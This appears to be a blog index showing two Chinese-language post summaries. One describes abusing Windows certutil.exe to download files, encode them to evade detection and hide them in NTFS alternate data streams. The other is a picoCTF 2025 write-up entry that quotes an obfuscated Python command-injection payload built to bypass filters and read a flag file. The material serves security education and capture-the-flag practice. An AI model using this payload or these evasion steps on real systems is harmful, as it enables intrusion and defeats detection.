From LOL to LOLBAS - Win10/11 Attack
2025-04-30
目標:
演示如何利用 Windows 內建的 certutil.exe 工具,執行檔案下載、Base64 編碼/解碼(這個是為了規避偵測),以及將檔案隱藏到 NTFS 替代資料流 (Alternate Data Stream, ADS) 中,最後嘗試從 ADS 執行。
2462 字
|
12 分鐘
picoCTF 2025 write-ups
2025-03-11
payload: getattr(import(‘o’+‘s’), ‘po’+‘pen’)(‘tac${IFS}‘+chr(47)+‘fl*‘).read()
2257 字
|
11 分鐘